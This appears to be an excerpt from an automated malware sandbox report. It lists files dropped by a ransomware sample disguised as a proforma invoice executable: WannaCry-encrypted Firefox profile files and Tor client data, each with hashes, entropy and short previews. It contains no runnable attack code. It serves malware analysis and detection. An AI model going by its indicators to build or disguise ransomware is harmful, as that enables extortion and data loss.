                                                          Category:dropped
                                                          Size (bytes):295192
                                                          Entropy (8bit):7.999217367217706
                                                          Encrypted:true
                                                          SSDEEP:6144:0OxsnJTh6WoRcQZHif+z3+kv55IYpEAArsQea5EN55GLD:0ywYdRQ+TLIYpEhr4QEz5qD
                                                          MD5:33F070D4ACF1C09BA9A7DCEBBEB625A6
                                                          SHA1:6807E9D791D88EE3A391E3DB7E98B7234A555871
                                                          SHA-256:BB6692EDB0F0E9504D9DC7CFD13414B9C72E2D0D2D78854026F428208E9AEAF8
                                                          SHA-512:B1A98EE1546CE1735D0EBC7F928634A21F571CB82E99B667F574D2F179978BC6A89DC48F87278BC16EA2DA744B7263988E4328AF4B72D50782985E4CE4592292
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....P2p..R..&q....s_.].BW6.#..~,.j..6.|.v........P..>......^r..V..cWi4<@..E|...*.R..D.1:.....y+..{7..fz. .0...'..b.....V........fr.<.)..LT..P....n..C.?...|G.].a9..D..GB..=q...U...E.vJ.sRh..<..)..`.."..4...$hev............)<.^'G.cR.j]Y.3.....~^.............\<F......%.7..;..b#l..NL:.Wz.TEl.uEN.....D...T.PP+ES....(......E...*../EI.k.....2"/.6...._...x.].....>r6..M.K.Q.p0..rl.......B/u...|.Ybp.^............(+E._.dE..1.J!......G.Zf..@[v...e.pG.X.B.].2.M..........u..l..........*..B..^....2.>....[.Az.%.5.s%.......r.^K...)[Z.....r.hd>Ez..9...}.Dz...%.@.W&DcM.:n..i{.8.#.EE.2&..q..c...,..cd.f.S.W/..[..... .....=.....+...B....h..f.VL.\,A.5.z..>...f.....w......j....e.].fqk...{4.2...(....\.`..n..0....B..A{...w.aI..i...|X1.E.T..?xpw.G.b.5....]......0$..f....`.....a....Q^. ) p.V....n.# 4....[>...?.{.E.z(h..w...{B.~.{..U....3G...S.#tX\o..~.2G-..-`u.B....._...da..>=..FXaJ.T....OXk..R..v.I./}{.}..<...T..>..1.$G.{Z..Yg"T...c.&J.8...X..L{

                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):295192
                                                          Entropy (8bit):7.999217367217706
                                                          Encrypted:true
                                                          SSDEEP:6144:0OxsnJTh6WoRcQZHif+z3+kv55IYpEAArsQea5EN55GLD:0ywYdRQ+TLIYpEhr4QEz5qD
                                                          MD5:33F070D4ACF1C09BA9A7DCEBBEB625A6
                                                          SHA1:6807E9D791D88EE3A391E3DB7E98B7234A555871
                                                          SHA-256:BB6692EDB0F0E9504D9DC7CFD13414B9C72E2D0D2D78854026F428208E9AEAF8
                                                          SHA-512:B1A98EE1546CE1735D0EBC7F928634A21F571CB82E99B667F574D2F179978BC6A89DC48F87278BC16EA2DA744B7263988E4328AF4B72D50782985E4CE4592292
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....P2p..R..&q....s_.].BW6.#..~,.j..6.|.v........P..>......^r..V..cWi4<@..E|...*.R..D.1:.....y+..{7..fz. .0...'..b.....V........fr.<.)..LT..P....n..C.?...|G.].a9..D..GB..=q...U...E.vJ.sRh..<..)..`.."..4...$hev............)<.^'G.cR.j]Y.3.....~^.............\<F......%.7..;..b#l..NL:.Wz.TEl.uEN.....D...T.PP+ES....(......E...*../EI.k.....2"/.6...._...x.].....>r6..M.K.Q.p0..rl.......B/u...|.Ybp.^............(+E._.dE..1.J!......G.Zf..@[v...e.pG.X.B.].2.M..........u..l..........*..B..^....2.>....[.Az.%.5.s%.......r.^K...)[Z.....r.hd>Ez..9...}.Dz...%.@.W&DcM.:n..i{.8.#.EE.2&..q..c...,..cd.f.S.W/..[..... .....=.....+...B....h..f.VL.\,A.5.z..>...f.....w......j....e.].fqk...{4.2...(....\.`..n..0....B..A{...w.aI..i...|X1.E.T..?xpw.G.b.5....]......0$..f....`.....a....Q^. ) p.V....n.# 4....[>...?.{.E.z(h..w...{B.~.{..U....3G...S.#tX\o..~.2G-..-`u.B....._...da..>=..FXaJ.T....OXk..R..v.I./}{.}..<...T..>..1.$G.{Z..Yg"T...c.&J.8...X..L{

                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\pkcs11.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):808
                                                          Entropy (8bit):7.731330807414836
                                                          Encrypted:false
                                                          SSDEEP:12:bkEDBt1mP3p5toe9hC97kclfA2oPQsdOzJ9PqyJpbs16tuQroLoce665DTa3UFWC:bk2mP3p5tzUY2uItZqa1scEQ8LovEsV
                                                          MD5:D70BD211451D397C3F34A859B3188B86
                                                          SHA1:D4E584FA0771DB68CEC150126F1B7F6527AF4CA4
                                                          SHA-256:03AFE15882CFFC067B00BB8AA9977599AB3F7362DDEC2515351DE5334FC0E8D1
                                                          SHA-512:08F50BFB7B1229E9873F6E922664F938697A4C823D11C16F52977E936C230A835804BF709547407B3850A132C51B62F9E122A87C83D5AF350F7F95B4AF6B67CC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......G)....v.(....0...~.J........=#.iZ.].B.....k!...no.e..3..A...g.N....E...W..........%+.....Za..@.q....J...}e.....Q.............(.:..[P.f\a.`..L.:.^~...~c"...*...../.C...)2........s%Y...=..u^.....Ehd.....c.Tg..b.hqF..a.;+..).<..t&BC...,/,...#...D.............J'Ui.oA......w.....)8*..`.`....W.!mn.s^ez..H.[..V..C)n....FW..u..N.t.rj.....Y.1..t.D...Y&.A.....P8X..zO......i.&a..kF..ry..^*(..S.........p...hF.-....".{..w.&..n:k.L+B....p.U..~Aw.@$.wMA.`.w;.'.9J.m..w..D._.".V.eX?.,.&.v{.L.... .[.!y4ppX$...1......y#........BC......6...K...D....q.s&.".].~..h..YZ^..d...o..`.....|.y.9.A......CCL...v..E.i1B..=..G.e.cV.....y....fcL.?<...".@..FP..t.~.....]O........K..v.A,.E*.{..;.|..[.8;v....zmL...iN.x...}..`..%..?.k...i.u......Q.1u.6.ZdB..._..;.h..x.6....S.!.

                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\pkcs11.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):808
                                                          Entropy (8bit):7.731330807414836
                                                          Encrypted:false
                                                          SSDEEP:12:bkEDBt1mP3p5toe9hC97kclfA2oPQsdOzJ9PqyJpbs16tuQroLoce665DTa3UFWC:bk2mP3p5tzUY2uItZqa1scEQ8LovEsV
                                                          MD5:D70BD211451D397C3F34A859B3188B86
                                                          SHA1:D4E584FA0771DB68CEC150126F1B7F6527AF4CA4
                                                          SHA-256:03AFE15882CFFC067B00BB8AA9977599AB3F7362DDEC2515351DE5334FC0E8D1
                                                          SHA-512:08F50BFB7B1229E9873F6E922664F938697A4C823D11C16F52977E936C230A835804BF709547407B3850A132C51B62F9E122A87C83D5AF350F7F95B4AF6B67CC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......G)....v.(....0...~.J........=#.iZ.].B.....k!...no.e..3..A...g.N....E...W..........%+.....Za..@.q....J...}e.....Q.............(.:..[P.f\a.`..L.:.^~...~c"...*...../.C...)2........s%Y...=..u^.....Ehd.....c.Tg..b.hqF..a.;+..).<..t&BC...,/,...#...D.............J'Ui.oA......w.....)8*..`.`....W.!mn.s^ez..H.[..V..C)n....FW..u..N.t.rj.....Y.1..t.D...Y&.A.....P8X..zO......i.&a..kF..ry..^*(..S.........p...hF.-....".{..w.&..n:k.L+B....p.U..~Aw.@$.wMA.`.w;.'.9J.m..w..D._.".V.eX?.,.&.v{.L.... .[.!y4ppX$...1......y#........BC......6...K...D....q.s&.".].~..h..YZ^..d...o..`.....|.y.9.A......CCL...v..E.i1B..=..G.e.cV.....y....fcL.?<...".@..FP..t.~.....]O........K..v.A,.E*.{..;.|..[.8;v....zmL...iN.x...}..`..%..?.k...i.u......Q.1u.6.ZdB..._..;.h..x.6....S.!.

                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\prefs.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9608
                                                          Entropy (8bit):7.981340441988807
                                                          Encrypted:false
                                                          SSDEEP:192:5PrHkT0i18uhR8N98CCXCEgxRlpBoIosqiAf1kwcEzmpMQ86sTPNGu7K:xrHkT068uhGf87XCEoRtolu5wcam2Q8+
                                                          MD5:8CEF8B5EF3D340C933E010038A061291
                                                          SHA1:3A3AA34396C7A32D663388F745C6A6B3CCC3A9A7
                                                          SHA-256:04217D9F6BD548C62683F7DAC1062584D91AE504E7DD18B6838852418510E201
                                                          SHA-512:3160AD0310D8B6426C464F5738ACCD79E9AAD6246E276AA7F76E917BEB2AD8871D78C1E38615AF8E444C27FC3F91DC32AA6CC0C5EDE129C700C89039C6AED1E2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....+..*.......k+...9....G.&.d..I..A[*...#X.]..b.._.......%....:.:w..0.=y..L..9k..Lor..:S...w|.6....^.{..[m......e.+.../;.cO*.&..G.-...r.....c...r..f....Q..F4..]w.<...Z..&V....U..#.,~b.I...P....S.y!.g.j..-C.]....-.....(.F...n.|...1....?.VR...\.C....f$......H..P.l....}.......o..$;..'N.......;..)#...,.nJF.uT...R...o....."......@.~...UY...$...!cq..W...(X.K.qI...!..c\2T...3 kw....Q.........[\..%...s...3....U....g.U.....b.2..w..iF.O..X.[.)...Z.}.a.........-...n.F.......C\.;......-(...a"J..+...XA.'1.M.....6mC..d3.Y-.....G'._}G.e..}...'...8..R.{..!......o.e..Z.~hd8x..@.~..F.nm..,.d!....w.b..\..0...=....<.U.u.%........d.G...a..L..i.....I.Q._/........;..g_..y...%..O..Jp.\.,.._[....u....e..;......... ...w.+.....w....:%.O.Y...%..Il.J%.$B.-`.J:...v.pS......;a4.3\.P...f......X.....1...mc..kH.+.D...N..-i..n]n.C...ujR?J*.:.._.....%+...>..D.&..pY>I..O..Zr/F.x?cfuH..D5....gr......W.<O8.#..O.F.......T.h.;.q>+nrq.{.<....a..u.9?.4....>.....6.}![K..>.

                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\prefs.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9608
                                                          Entropy (8bit):7.981340441988807
                                                          Encrypted:false
                                                          SSDEEP:192:5PrHkT0i18uhR8N98CCXCEgxRlpBoIosqiAf1kwcEzmpMQ86sTPNGu7K:xrHkT068uhGf87XCEoRtolu5wcam2Q8+
                                                          MD5:8CEF8B5EF3D340C933E010038A061291
                                                          SHA1:3A3AA34396C7A32D663388F745C6A6B3CCC3A9A7
                                                          SHA-256:04217D9F6BD548C62683F7DAC1062584D91AE504E7DD18B6838852418510E201
                                                          SHA-512:3160AD0310D8B6426C464F5738ACCD79E9AAD6246E276AA7F76E917BEB2AD8871D78C1E38615AF8E444C27FC3F91DC32AA6CC0C5EDE129C700C89039C6AED1E2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....+..*.......k+...9....G.&.d..I..A[*...#X.]..b.._.......%....:.:w..0.=y..L..9k..Lor..:S...w|.6....^.{..[m......e.+.../;.cO*.&..G.-...r.....c...r..f....Q..F4..]w.<...Z..&V....U..#.,~b.I...P....S.y!.g.j..-C.]....-.....(.F...n.|...1....?.VR...\.C....f$......H..P.l....}.......o..$;..'N.......;..)#...,.nJF.uT...R...o....."......@.~...UY...$...!cq..W...(X.K.qI...!..c\2T...3 kw....Q.........[\..%...s...3....U....g.U.....b.2..w..iF.O..X.[.)...Z.}.a.........-...n.F.......C\.;......-(...a"J..+...XA.'1.M.....6mC..d3.Y-.....G'._}G.e..}...'...8..R.{..!......o.e..Z.~hd8x..@.~..F.nm..,.d!....w.b..\..0...=....<.U.u.%........d.G...a..L..i.....I.Q._/........;..g_..y...%..O..Jp.\.,.._[....u....e..;......... ...w.+.....w....:%.O.Y...%..Il.J%.$B.-`.J:...v.pS......;a4.3\.P...f......X.....1...mc..kH.+.D...N..-i..n]n.C...ujR?J*.:.._.....%+...>..D.&..pY>I..O..Zr/F.x?cfuH..D5....gr......W.<O8.#..O.F.......T.h.;.q>+nrq.{.<....a..u.9?.4....>.....6.}![K..>.

                                                          C:\Users\user\AppData\Roaming\tor\cached-certs (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):11390
                                                          Entropy (8bit):6.048875955337293
                                                          Encrypted:false
                                                          SSDEEP:192:rh4D8V05d1hN13Ff9wY40VVs/1h8PIetFBor4inaTDYfIVVdzfP1hitMY4THRekI:rh4YVc1h1f/40VVq1h8PXtFU4WGYgVVU
                                                          MD5:7399C7C8EC15873AD98414AF2EF67463
                                                          SHA1:CED0A4BFFC3D9137660A2A8202813525DBE189F6
                                                          SHA-256:B1A3B5F2E2928CDFCE04E5FE539EFEF2CF3AF5891F12F8B1DB47CFAAE61BEB73
                                                          SHA-512:461920F6030EAFF55BD185351C7B8A966365FCBFD367FFB61D3008E3DC9114C6D273D262C5D55411342405B102FBF8C458F32EA98EF2670C9EC5509C7379329E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:dir-key-certificate-version 3..fingerprint E8A9C45EDE6D711294FADF8E7951F4DE6CA56B58..dir-key-published 2023-04-25 08:58:01..dir-key-expires 2024-10-25 08:58:01..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu/DOrbv/4IAYvyxsy/6ivC3q5yCQBWLKHZGYKQa5G/3rem8wen0f..qF7y4ye6U6faWc5kcNMHEKMIeBzMErxwF345qoGHITxbbOWnizgwPgrdCwlK3p0H..1XZGU/TTjoaM25P+ZNCBvGmDQRAtgs2odnv+i8hpu6vrcAUZYXmmw/Ag1Ou2AlLC..mPpbjV1O5SMylgC4IuCBPr3iA+M1kKkvj4LmwU6pJxjAae76GLzzQ/Ffvi7rRpvU..2BHetjehk+7/t8izgbhT4VABtzKgrv9ATnhfEgPeT/WBq0E75iciBBAXRPF5kEA4..k++NPy21XpL7jkQ4wnMs2HyiFhHbUwbLcoyQ/JVq/WBboSwStYbkdizRpkhJ1eNg..LiD8CPWcZnhWZi9VWrwT0xl+Mu4v6kwo9kVnXhOfcK8Wni9FqiBu2tmNDoGPG1Ac..wptYQSIoujuLgn4MARREwo9cWrKp2w+D7Dt4U7U5OrXL7TXjonEKuEHwRhzz1JA8..7LXm/wENwn1/AgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAv28sclFL4zONBiZYTd2gE8dHTId7hsjP98H4PcY+IeVPs2hqdCTA..O0SsaOEGL9kGzzhWr7NUujDzHJ6j9xiCj4vePC/78/lN5tihjTD4TNzcrxEI6K08..mE6B5iXyuafojb7d1/3ssZ/qDjyj

                                                          C:\Users\user\AppData\Roaming\tor\cached-certs.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):11390
                                                          Entropy (8bit):6.048875955337293
                                                          Encrypted:false
                                                          SSDEEP:192:rh4D8V05d1hN13Ff9wY40VVs/1h8PIetFBor4inaTDYfIVVdzfP1hitMY4THRekI:rh4YVc1h1f/40VVq1h8PXtFU4WGYgVVU
                                                          MD5:7399C7C8EC15873AD98414AF2EF67463
                                                          SHA1:CED0A4BFFC3D9137660A2A8202813525DBE189F6
                                                          SHA-256:B1A3B5F2E2928CDFCE04E5FE539EFEF2CF3AF5891F12F8B1DB47CFAAE61BEB73
                                                          SHA-512:461920F6030EAFF55BD185351C7B8A966365FCBFD367FFB61D3008E3DC9114C6D273D262C5D55411342405B102FBF8C458F32EA98EF2670C9EC5509C7379329E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:dir-key-certificate-version 3..fingerprint E8A9C45EDE6D711294FADF8E7951F4DE6CA56B58..dir-key-published 2023-04-25 08:58:01..dir-key-expires 2024-10-25 08:58:01..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu/DOrbv/4IAYvyxsy/6ivC3q5yCQBWLKHZGYKQa5G/3rem8wen0f..qF7y4ye6U6faWc5kcNMHEKMIeBzMErxwF345qoGHITxbbOWnizgwPgrdCwlK3p0H..1XZGU/TTjoaM25P+ZNCBvGmDQRAtgs2odnv+i8hpu6vrcAUZYXmmw/Ag1Ou2AlLC..mPpbjV1O5SMylgC4IuCBPr3iA+M1kKkvj4LmwU6pJxjAae76GLzzQ/Ffvi7rRpvU..2BHetjehk+7/t8izgbhT4VABtzKgrv9ATnhfEgPeT/WBq0E75iciBBAXRPF5kEA4..k++NPy21XpL7jkQ4wnMs2HyiFhHbUwbLcoyQ/JVq/WBboSwStYbkdizRpkhJ1eNg..LiD8CPWcZnhWZi9VWrwT0xl+Mu4v6kwo9kVnXhOfcK8Wni9FqiBu2tmNDoGPG1Ac..wptYQSIoujuLgn4MARREwo9cWrKp2w+D7Dt4U7U5OrXL7TXjonEKuEHwRhzz1JA8..7LXm/wENwn1/AgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAv28sclFL4zONBiZYTd2gE8dHTId7hsjP98H4PcY+IeVPs2hqdCTA..O0SsaOEGL9kGzzhWr7NUujDzHJ6j9xiCj4vePC/78/lN5tihjTD4TNzcrxEI6K08..mE6B5iXyuafojb7d1/3ssZ/qDjyj

                                                          C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          File Type:ASCII text, with very long lines (1006), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):2901012
                                                          Entropy (8bit):5.640507376056186
                                                          Encrypted:false
                                                          SSDEEP:12288:NdgcaLDCOT+xVaLkI2KZkhLU/Jmi1ORcq0hsOaxuwvaIDsaMQ9nmxrZKZjAqKQRR:N1OKokX5U/JbPSxbzyrZmR9nXJhb
                                                          MD5:52928D1A674FE90BFC1795C0514E1368
                                                          SHA1:8674B896AE248E083550B888AD550C5A38B57643
                                                          SHA-256:72300AAAA81E3709129A6404D7C16EAC48CCF4339AEBECE5D608C0FE253AA80B
                                                          SHA-512:99CCD597D08C15D8B22E69A8333F11D5EC9E586E62FFDA99B0D661582E8CB4A4697F0746BDF388EBB583784E3B9F0358A47CEC004C7BC16DF1CB8FA9ABA6D88B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 33..valid-after 2024-01-16 10:00:00..fresh-until 2024-01-16 11:00:00..valid-until 2024-01-16 13:00:00..voting-delay 300 300..client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Rel

                                                          C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          File Type:ASCII text, with very long lines (1006), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):2901012
                                                          Entropy (8bit):5.640507376056186
                                                          Encrypted:false
                                                          SSDEEP:12288:NdgcaLDCOT+xVaLkI2KZkhLU/Jmi1ORcq0hsOaxuwvaIDsaMQ9nmxrZKZjAqKQRR:N1OKokX5U/JbPSxbzyrZmR9nXJhb
                                                          MD5:52928D1A674FE90BFC1795C0514E1368
                                                          SHA1:8674B896AE248E083550B888AD550C5A38B57643
                                                          SHA-256:72300AAAA81E3709129A6404D7C16EAC48CCF4339AEBECE5D608C0FE253AA80B
                                                          SHA-512:99CCD597D08C15D8B22E69A8333F11D5EC9E586E62FFDA99B0D661582E8CB4A4697F0746BDF388EBB583784E3B9F0358A47CEC004C7BC16DF1CB8FA9ABA6D88B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 33..valid-after 2024-01-16 10:00:00..fresh-until 2024-01-16 11:00:00..valid-until 2024-01-16 13:00:00..voting-delay 300 300..client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Rel

                                                          C:\Users\user\AppData\Roaming\tor\state (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):385
                                                          Entropy (8bit):5.228822700626254
                                                          Encrypted:false
                                                          SSDEEP:6:SbdWwxXa5nXr87+QVe2vwR/EnNiUCsT08zU6WUcGAuWWURbibfl88x:bwxX4Xr87HVBvwNOF0d6WxGAUPh
                                                          MD5:5E415EE805C3D619C720B91D14E6AFD1
                                                          SHA1:52835A4B95C01845A6C8D7A40F8843881305BD8A
                                                          SHA-256:D298FD5A0380F5C2303BADE59F6717600696B494C3AC72AFEE1AC92A668EE9CD
                                                          SHA-512:6247BA3E16782D8C8C66D22A6A95DE7F575D47E9A384CB2597BEBED99B9D47F2B8195DFAB88CA95979F2D3536FEB6FFD79DBBA7122470F8B126B94872F5CD5F7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# Tor state file last generated on 2024-01-16 12:00:22 local time..# Other times below are in UTC..# You *do not* need to edit this file.....EntryGuard cozybeardev AC7BDB39F81C4B364EA50B12B51C77C7A131EA7C DirCache..EntryGuardAddedBy AC7BDB39F81C4B364EA50B12B51C77C7A131EA7C 0.2.9.10 2023-12-18 19:51:54..TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2024-01-16 11:00:22..

                                                          C:\Users\user\AppData\Roaming\tor\state.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):385
                                                          Entropy (8bit):5.228822700626254
                                                          Encrypted:false
                                                          SSDEEP:6:SbdWwxXa5nXr87+QVe2vwR/EnNiUCsT08zU6WUcGAuWWURbibfl88x:bwxX4Xr87HVBvwNOF0d6WxGAUPh
                                                          MD5:5E415EE805C3D619C720B91D14E6AFD1
                                                          SHA1:52835A4B95C01845A6C8D7A40F8843881305BD8A
                                                          SHA-256:D298FD5A0380F5C2303BADE59F6717600696B494C3AC72AFEE1AC92A668EE9CD
                                                          SHA-512:6247BA3E16782D8C8C66D22A6A95DE7F575D47E9A384CB2597BEBED99B9D47F2B8195DFAB88CA95979F2D3536FEB6FFD79DBBA7122470F8B126B94872F5CD5F7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# Tor state file last generated on 2024-01-16 12:00:22 local time..# Other times below are in UTC..# You *do not* need to edit this file.....EntryGuard cozybeardev AC7BDB39F81C4B364EA50B12B51C77C7A131EA7C DirCache..EntryGuardAddedBy AC7BDB39F81C4B364EA50B12B51C77C7A131EA7C 0.2.9.10 2023-12-18 19:51:54..TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2024-01-16 11:00:22..

                                                          C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          File Type:ASCII text, with very long lines (1006), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):2901012
                                                          Entropy (8bit):5.640507376056186
                                                          Encrypted:false
                                                          SSDEEP:12288:NdgcaLDCOT+xVaLkI2KZkhLU/Jmi1ORcq0hsOaxuwvaIDsaMQ9nmxrZKZjAqKQRR:N1OKokX5U/JbPSxbzyrZmR9nXJhb
                                                          MD5:52928D1A674FE90BFC1795C0514E1368
                                                          SHA1:8674B896AE248E083550B888AD550C5A38B57643
                                                          SHA-256:72300AAAA81E3709129A6404D7C16EAC48CCF4339AEBECE5D608C0FE253AA80B
                                                          SHA-512:99CCD597D08C15D8B22E69A8333F11D5EC9E586E62FFDA99B0D661582E8CB4A4697F0746BDF388EBB583784E3B9F0358A47CEC004C7BC16DF1CB8FA9ABA6D88B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 33..valid-after 2024-01-16 10:00:00..fresh-until 2024-01-16 11:00:00..valid-until 2024-01-16 13:00:00..voting-delay 300 300..client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Rel

                                                          C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          File Type:ASCII text, with very long lines (1006), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):2901012
                                                          Entropy (8bit):5.640507376056186
                                                          Encrypted:false
                                                          SSDEEP:12288:NdgcaLDCOT+xVaLkI2KZkhLU/Jmi1ORcq0hsOaxuwvaIDsaMQ9nmxrZKZjAqKQRR:N1OKokX5U/JbPSxbzyrZmR9nXJhb
                                                          MD5:52928D1A674FE90BFC1795C0514E1368
                                                          SHA1:8674B896AE248E083550B888AD550C5A38B57643
                                                          SHA-256:72300AAAA81E3709129A6404D7C16EAC48CCF4339AEBECE5D608C0FE253AA80B
                                                          SHA-512:99CCD597D08C15D8B22E69A8333F11D5EC9E586E62FFDA99B0D661582E8CB4A4697F0746BDF388EBB583784E3B9F0358A47CEC004C7BC16DF1CB8FA9ABA6D88B
                                                          Malicious:false
                                                          Reputation:unknown
